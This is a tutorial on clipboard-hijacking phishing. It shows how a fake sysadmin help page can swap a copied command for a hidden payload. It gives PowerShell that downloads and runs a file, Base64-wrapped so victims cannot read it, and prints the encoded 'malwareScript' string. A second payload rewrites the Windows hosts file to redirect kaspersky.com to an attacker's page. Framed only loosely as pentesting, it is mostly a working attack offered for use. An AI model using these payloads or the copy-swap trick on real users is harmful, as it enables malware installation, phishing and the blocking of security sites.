Phishing CMD scripts idea

Introduction

Hi everyone, today I would like to tell you about an unconventional but nevertheless interesting way of using social engineering and technical skills. Let's get started, it's not uncommon for Windows (and Linux/MacOS in general) users to google for solutions to errors or customization of something, it can be absolutely anything:

• Installing a programming language
• Running scripts
• Updating components
• Retrieving system information
• Disabling system parameters (banal proxy installation)

The peculiarity is that the target audience is absolutely different, the topic is of interest to both standard users and system administrators, who may be beginners or experienced. It will be extremely easy to create phishing, you can use the idea for mass penetration testing, but also for target pentesting.

Start

First we have to decide what task we will propose to solve, it can even be installing any console software. Find any simple sys.admin site and customize, you can roll your own or with GPT, technology is on our side in this regard :) Well, I will show a simple example, here we found a site, for example:

We see a normal layout, there are useful commands, in this context there is the user is prompted to customize the database by alternately entering commands. There is an option to copy at the click of a button. That's what we need. I will show you a simple example, then you adapt to your site code. Here I have sketched the same fragment:

What is here? Here on the HTML code creates a block pre inside a block div with a button button with the identifier btn, further block p inside which the command-bait, which the user will try to copy.

This is our bait! 

Here we have added an event handler when our page is fully loaded, then we create a variable to store our payload and then we create a button click event handler that writes our payload to the buffer, but there is also a case where the user will select the text themselves and press Ctrl+C or select “Copy” from the context menu that appears when we right click. We can make a handler for this too:

Here we have bound an event to our page that listens for any copying, then cancels the copying as if nothing happened, and then writes our payload to the buffer.

Actually, the main part for phishing is ready, it remains to develop a payload that the user will activate. Well, I think we won't experiment too much in this tutorial format, let's look at a few options that will work for PowerShell Windows.

Our task is elementary and has a number of sequential actions:

• Create variables with the download link and the path where the download will go
• Download the payload
• Run the payload

Here is our PowerShell script that we will run via the command line:

$url = 'https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png';

$output = [System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::Desktop);

$output += '\file.png';

Invoke-WebRequest -Uri $url -OutFile $output

Start-Process -FilePath $output

Encode to Base64 string:

We encrypted, it will be useful, so that when the script will be run, there will be less content, such as links and the like, which the user can easily understand, this option is also not the most secretive, but it is better and easier to pass the script in this format. Here we specified a link to the payload in a variable(for example we will download the Google logo from the search bar. Then we created a variable where we will get the desktop, you can also download to other directories (Downloads, Documents, AppData) and added the file name, what will be the name of the downloaded file, you can also name it payload.exe and it will download and then execute. Then we call a PowerShell function that runs the download by passing parameters to the link where to download from and by specifying the path to download from and then runs the file.

Next, we need to wrap the payload in a script that will be suitable for execution from the coand line.

powershell -Command "$text = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(' ENCODED_TO_BASE64_PAYLOAD ')); powershell -Command $text"

Here we run PowerShell from the command line, passing in the command parameter to the cmdlet, which will assign our payload to the text variable, decoding it, then run PowerShell also passing in our entire decoded script to the cmdlet. Let's try it!

Here is the only alert that warns the user that the script to be inserted will be executed immediately, that pops up in Windows 11, that's why we typed the long command, you can put the user's command at the end if you want. The user agrees and the PowerShell magic happens ! 

As you can see the command executed successfully, the image downloaded and then ran, in combat conditions it could be an executable file.

Here is the full variable for html:

let malwareScript = `mysql -u root -p\npowershell -Command "$text = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHVybCA9ICdodHRwczovL3d3dy5nb29nbGUuY29tL2ltYWdlcy9icmFuZGluZy9nb29nbGVsb2dvLzJ4L2dvb2dsZWxvZ29fY29sb3JfMjcyeDkyZHAucG5nJzsKJG91dHB1dCA9IFtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKFtTeXN0ZW0uRW52aXJvbm1lbnQrU3BlY2lhbEZvbGRlcl06OkRlc2t0b3ApOwokb3V0cHV0ICs9ICdcZmlsZS5wbmcnOwpJbnZva2UtV2ViUmVxdWVzdCAtVXJpICR1cmwgLU91dEZpbGUgJG91dHB1dApTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAkb3V0cHV0')); powershell -Command $text"\n`;

There is also an alternative option. We can transfer the user to phishing. No one is protected from this, it is required to write a script that will be under the desired OS, but it is required to apply SI to make the user run your code with administrator rights. To do this, we will need to overwrite the hosts file in Windows. C:/Windows/System32/drivers/etc/hosts . For example, when I try to open kaspersky.com my site will be opened, I will raise a fake site on local, you can raise any site and just enter its IP address. You can put anything you want, so that your resource opens instead of some specific sites.

This is what it looks like before the changes:

We just need to add at the end of the line with the IP-address of the page where we will translate the user and the domain name of the site from which we will translate, this is how the system of DNS-servers works, we address the domain, and get the final IP-address. Let's insert a line at the end:

127.0.0.1 kaspersky.com

Instead of 127.0.0.1, you will specify the IP address of the desired server with your page.

Here our script:

$ip_string = '127.0.0.1 kaspersky.com';

$system = [System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::System);

$system += '\drivers\etc\hosts';

Add-Content -Path $system -Value $ip_string

Found the System32 folder and hosts file, and then substituted the value of the string we'll add to the end into a variable. We code and wrap it in the previously created payload:

let malwareScript = `mysql -u root -p\npowershell -Command "$text = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGlwX3N0cmluZyA9ICcxMjcuMC4wLjEga2FzcGVyc2t5LmNvbSc7CiRzeXN0ZW0gPSBbU3lzdGVtLkVudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aChbU3lzdGVtLkVudmlyb25tZW50K1NwZWNpYWxGb2xkZXJdOjpTeXN0ZW0pOwokc3lzdGVtICs9ICdcZHJpdmVyc1xldGNcaG9zdHMnOwpBZGQtQ29udGVudCAtUGF0aCAkc3lzdGVtIC1WYWx1ZSAkaXBfc3RyaW5n')); powershell -Command $text"\n`;

Try it! A script run on the command line with administrator privileges changed the file:

Open and you can see result:

We changed the configuration file and now when you open the Kaspersky page opens our page, the rest of the features I will leave to your imagination, this trick is used by system administrators when they want to restrict from resources specific, redirecting to a site that says “Access to the resource is restricted”.

Thanks for reading! I look forward to your reactions and maybe I'll keep showing tricks!